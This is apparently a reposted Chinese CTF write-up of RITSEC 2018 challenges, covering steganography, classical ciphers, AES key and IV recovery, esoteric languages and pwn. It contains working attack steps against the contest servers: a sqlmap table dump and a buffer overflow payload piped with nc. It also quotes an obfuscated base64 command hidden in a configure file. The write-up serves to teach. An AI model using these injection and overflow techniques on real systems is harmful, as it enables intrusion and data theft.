内容简介:打开网站,好像可以提供搜索功能抓个包,试试注入sqlmap -r burp.txt -D challenge -T spaceships --dump
Space Force
The Space Force has created a portal for the public to learn about and be in awe of our most elite Space Force Fighters. Check it out at fun.ritsec.club:8005!
打开网站,好像可以提供搜索功能
抓个包,试试注入
POST /index.php HTTP/1.1 Host: fun.ritsec.club:8005 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://fun.ritsec.club:8005/index.php Content-Type: application/x-www-form-urlencoded Content-Length: 16 Connection: keep-alive Upgrade-Insecure-Requests: 1 name=The+Javelin
sqlmap -r burp.txt -D challenge -T spaceships --dump
flag:RITSEC{hey_there_h4v3_s0me_point$_3ny2Lx}
Burn the candle on both ends
常规套路.藏了个zip,分解就可以了
可是还有密码,经过很久很久的爆破,密码为stegosaurus
flag:RITSEC{8U51N355-1N-7H3-Fr0N7-P4r7Y-1N-7H3-84CK}
I am a Stegosaurus
下载图片下来,linux打不开,可能是修改了图片的高或者宽,放到windows直接可以打开,flag就在图片下方
flag:RITSEC{th1nk_0uts1d3_th3_b0x}
Nobody uses the eggplant emoji
这是个脑洞大开的题目,密文全是表情包
题目:
发现这些表情包中还夹杂这一些下划线,可以尝试将这些表情包转化为不同的字符来
得到ABCDEFCGHAIJCDEFCKLMCNELGHDCEBCGHMCBOKPCBALQGCDEFCRFQGCKIQNMLCGHMQMCGHLMMCSFMQGAEIQTCNHKGCAQCDEFCIKRMUCNHKGCAQCDEFLCSFMQGUCNHKGCAQCGHMCKALCQVMMWCXMOEYAGDCEBCKICFIOKWMICQNKOOENTCDEFLCBOKPCAQZCKBLAYKI[EL[MFLEVMKI[QNKOOEN[NEN[GHMLMQ[K[WABBMLMIYMC
再通过 词频分析 得到IFSYOUSTHINGSYOUSARESWORTHYSOFSTHESFLAMSFIRDTSYOUSJUDTSANDWERSTHEDESTHREESQUEDTIONDPSWHATSIDSYOUSNAJEVSWHATSIDSYOURSQUEDTVSWHATSIDSTHESAIRSDBEEKSZELOCITYSOFSANSUNLAKENSDWALLOWPSYOURSFLAMSIDXSAFRICAN[OR[EUROBEAN[DWALLOW[WOW[THERED[A[KIFFERENCES
经过替换字符
flag:RITSEC{african_or_european_swallow_wow_theres_a_difference}
Who drew on my program?
下载图片
百度了一下,发现好像是原题, https://github.com/dqi/ctf_writeup/tree/master/2015/tmctf/crypto200
跟这个题很像
也是划掉一些关键的信息,求出flag,看看他的payload
#!/usr/bin/python from Crypto.Cipher import AES import binascii import string import itertools # given bKEY = "5d6I9pfR7C1JQt" # use null bytes to minimize effect on output IV = "\x00"*16 def encrypt(message, passphrase): aes = AES.new(passphrase, AES.MODE_CBC, IV) return aes.encrypt(message) def decrypt(cipher, passphrase): aes = AES.new(passphrase, AES.MODE_CBC, IV) return aes.decrypt(cipher) pt = "The message is protected by AES!" ct = "fe000000000000000000000000009ec3307df037c689300bbf2812ff89bc0b49" # find the key using the plaintext and ciphertext we know, since the IV has no effect on the decryption of the second block for i in itertools.product(string.printable, repeat=2): eKEY = ''.join(i) KEY = bKEY + eKEY ptc = decrypt(binascii.unhexlify(ct), KEY) if ptc[16] == pt[16] and ptc[30] == pt[30] and ptc[31] == pt[31]: print "Got KEY: " + str(KEY) fKEY = KEY pt2 = binascii.hexlify(decrypt(binascii.unhexlify(ct), fKEY))[32:] print "Decrypting with CT mostly zeroes gives: " + pt2 print "Should be: " + binascii.hexlify(pt[16:]) # we can now recover the rest of the ciphertext ct by XOR(pt[i], decrypted[i], since we chose ct 00 in all the positions we are going to recover answer = "" for i in range(13): pi = pt[17+i] # letters from the plaintext pti = pt2[2*i+2:2*i+4] # 2 hex letters from decryption of second block answer += "%02X" % (ord(pi) ^ int(pti, 16)) rct = ct[0:2] + answer.lower() + ct[28:] print "Which means CT was: " + rct # now we can decrypt the recovered ct and xor against the pt to recover the IV wpt = decrypt(binascii.unhexlify(rct), fKEY) IV = "" for i in range(16): p = ord(pt[i]) ^ ord(wpt[i]) IV += "%02X" % p IV = binascii.unhexlify(IV) # sanity check: aes = AES.new(fKEY, AES.MODE_CBC, IV) print "Sanity check: " + aes.decrypt(binascii.unhexlify(rct)) # We won! print "The IV is: " + IV
将bKEY改成我们题目上面的
#!/usr/bin/python from Crypto.Cipher import AES import binascii import string import itertools # given bKEY = "9aF738g9AkI112" # use null bytes to minimize effect on output IV = "\x00"*16 def encrypt(message, passphrase): aes = AES.new(passphrase, AES.MODE_CBC, IV) return aes.encrypt(message) def decrypt(cipher, passphrase): aes = AES.new(passphrase, AES.MODE_CBC, IV) return aes.decrypt(cipher) pt = "The message is protected by AES!" ct = "9e00000000000000000000000000436a808e200a54806b0e94fb9633db9d67f0" # find the key using the plaintext and ciphertext we know, since the IV has no effect on the decryption of the second block for i in itertools.product(string.printable, repeat=2): eKEY = ''.join(i) KEY = bKEY + eKEY ptc = decrypt(binascii.unhexlify(ct), KEY) if ptc[16] == pt[16] and ptc[30] == pt[30] and ptc[31] == pt[31]: print "Got KEY: " + str(KEY) fKEY = KEY pt2 = binascii.hexlify(decrypt(binascii.unhexlify(ct), fKEY))[32:] print "Decrypting with CT mostly zeroes gives: " + pt2 print "Should be: " + binascii.hexlify(pt[16:]) # we can now recover the rest of the ciphertext ct by XOR(pt[i], decrypted[i], since we chose ct 00 in all the positions we are going to recover answer = "" for i in range(13): pi = pt[17+i] # letters from the plaintext pti = pt2[2*i+2:2*i+4] # 2 hex letters from decryption of second block answer += "%02X" % (ord(pi) ^ int(pti, 16)) rct = ct[0:2] + answer.lower() + ct[28:] print "Which means CT was: " + rct # now we can decrypt the recovered ct and xor against the pt to recover the IV wpt = decrypt(binascii.unhexlify(rct), fKEY) IV = "" for i in range(16): p = ord(pt[i]) ^ ord(wpt[i]) IV += "%02X" % p IV = binascii.unhexlify(IV) # sanity check: aes = AES.new(fKEY, AES.MODE_CBC, IV) print "Sanity check: " + aes.decrypt(binascii.unhexlify(rct)) # We won! print "The IV is: " + IV
flag:RITSEC{b4dcbc#g}
Talk to me
加入频道: https://discord.gg/p7tHuSq
搜索RITSEC
flag:RITSEC{its_like_irc-but_with_2_much_javascript}
Patch Patch
查看下patch-patch-patch文件
diff -ur patch-2.7.1/src/patch.c patch-2.7.1.1/src/patch.c
--- patch-2.7.1/src/patch.c 2018-11-02 01:12:30.625613158 -0400
+++ patch-2.7.1.1/src/patch.c 2018-11-02 01:13:21.498608985 -0400
@@ -1953,9 +1953,9 @@
fatal_exit (int sig)
{
cleanup ();
-#ifdef backdoor
- printf("Looks like we got a vulnerability here");
-#endif
+
+/* Removed a super bad vuln here */
+
if (sig)
exit_with_signal (sig);
并没有什么有用的东西,在看看patch-2.7.1-10.el7.centos.src,把它全部解压,发现其中的patch-2.7.1中的configure有个奇怪的东西
TEST=$(echo -e "\x55\x6b\x6c\x55\x55\x30\x56\x44\x65\x31\x5a\x56\x54\x45\x35\x54\x58\x7a\x52\x53\x4d\x31\x39\x43\x51\x55\x52\x66\x66\x51\x6f\x3d" | `echo -e "\x62\x61\x73\x65\x36\x34" -d`)
是个bash脚本,我们尝试运行下
echo -e "\x55\x6b\x6c\x55\x55\x30\x56\x44\x65\x31\x5a\x56\x54\x45\x35\x54\x58\x7a\x52\x53\x4d\x31\x39\x43\x51\x55\x52\x66\x66\x51\x6f\x3d" | `echo -e "\x62\x61\x73\x65\x36\x34" -d`
RITSEC{VULNS_4R3_BAD_}
flag:RITSEC{VULNS_4R3_BAD_}
What_Th._Fgck
题目就给了这个
OGK:DI_G;lqk"Kj1;"a"yao";fr3dog0o"vdtnsaoh"patsfk{+
这是个dvorak密码,下面是关于dvorak的键盘分布图
直接使用 工具
得到明文RITSEC{Isn't”Th1s”a”far”sup3eri0r”keyboard”layout?}
将其双引号改成下划线就可以了
flag:RITSEC{Isn't_Th1s_a_far_sup3eri0r_keyboard_layout?}
RIP
这个给了一张图和一段密文
+[----->+++<]>+.++++++++++++..----.+++.+[-->+<]>.-----------..++[--->++<]>+...---[++>---<]>.--[----->++<]>+.----------.++++++.-.+.+[->+++<]>.+++.[->+++<]>-.--[--->+<]>-.++++++++++++.--.+++[->+++++<]>-.++[--->++<]>+.-[->+++<]>-.--[--->+<]>-.++[->+++<]>+.+++++.++[->+++<]>+.----[->++<]>.[-->+<]>++.+++++++++.--[------>+<]>.--[-->+++<]>--.+++++++++++++.----------.>--[----->+<]>.-.>-[--->+<]>--.++++.---------.-.
解密之后是个链接 https://www.youtube.com/watch?v=F6LYOfeSWNM
没什么用,再看看图片,这个图片的奇怪之处在于他的周围是些彩色的小方块,c查了下才知道这些是一种编程语言PIET,我们把图片中的其他部分去掉
在线 解密
flag:RITSEC{WH4AT_TH3_P13T_1337}
Check out this cool filter
这个毫无头绪,看了大佬的wp才知道
from PIL import Image
img = Image.open('CheckOutThisFilter.png').convert('RGB')
w, h = img.size
codes = []
for y in range(0, h):
for x in range(0, w):
r, g, b = img.getpixel((x, y))
codes.append(b)#得到图片的blue值的排列
codes = codes[:51]
flag = ''
for code in codes:
flag += chr(code - 13)
print flag
flag:RITSEC{TIL_JPEG_COMPRESSION_MESSES_WITH_RGB_VALUES}
music.png
这个题也是大开眼界,这是一种新的音乐类型,被命名为“bytebeat”。
使用脚本从图片中提取出代码
from PIL import Image
img = Image.open('music.png').convert('RGB')
w, h = img.size
r_str = ''
g_str = ''
b_str = ''
for y in range(0, h):
for x in range(0, w):
r, g, b = img.getpixel((x, y))
r_str += chr(r)
g_str += chr(g)
b_str += chr(b)
s = r_str[:32] + g_str[:38] + b_str[:66]
print s
得到(t<<3)*[8/9,1,9/8,6/5,4/3,3/2,0][[0xd2d2c7,0xce4087,0xca32c7,0x8e4008][t>>14&3.1]>>(0x3dbe4687>>((t>>10&15)>9?18:t>>10&15)*3&7.1)*3&7.1]
通过在线工具 运行
播放了一段音乐,听歌识曲为「Never Gonna Give You Up」
所以flag为:RITSEC{never_gonna_give_you_up}
关于bytebeat的介绍 点我
ezpwn
拖到ida中查看
大概代码如下
int main(){
int x = 0;
char buffer;
FILE *f;
puts("Please enter your API key");
gets(&buffer);
f = fopen("flag.txt","r");
if(x==1){
while(y != -1){
y=fgetc(f); // Acts like the decrement
putchar(y);
fclose(f);
}
}
printf("%d\n",x);
}
定义了一个x为0,可是只有当x=1的时候才可以读取flag,其中关键的函数还是gets,可以来修改x的值,首先我们确定偏移量
└──╼ $./ezpwn Please enter your API key aaaabaaacaaadaaaeaaafaaagaaaha 1633771879
使用cyclic得到偏移量为24,在本地写个flag.txt,构造python -c 'print "A"*24 +"\x01" ' | ./ezpwn
└──╼ $python -c 'print "A"*24 +"\x01" ' | ./ezpwn
Please enter your API key
flag{666666}
1
本地成功
root@kali:~/pwn# python -c "print 'a'*24 + '\x01\x00\x00\x00'"| nc fun.ritsec.club 8001
Please enter your API key
RITSEC{Woah_Dud3_it's_really_that_easy?_am_i_leet_yet?}1
得到flag
flag:RITSEC{Woah_Dud3_it's_really_that_easy?_am_i_leet_yet?}
以上所述就是小编给大家介绍的《RITSEC2018》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
深入理解C#(第3版)
斯基特 (Jon Skeet) / 姚琪琳 / 人民邮电出版社 / 2014-4-1 / 99.00元
本书是世界顶级技术专家“十年磨一剑”的经典之作,在C#和.NET领域享有盛誉。与其他泛泛介绍C#的书籍不同,本书深度探究C#的特性,并结合技术发展,引领读者深入C#的时空。作者从语言设计的动机出发,介绍支持这些特性的核心概念。作者将新的语言特性放在C#语言发展的背景之上,用极富实际意义的示例,向读者展示编写代码和设计解决方案的最佳方式。同时作者将多年的C#开发经验与读者分享,读者可咀其精华、免走弯......一起来看看 《深入理解C#(第3版)》 这本书的介绍吧!
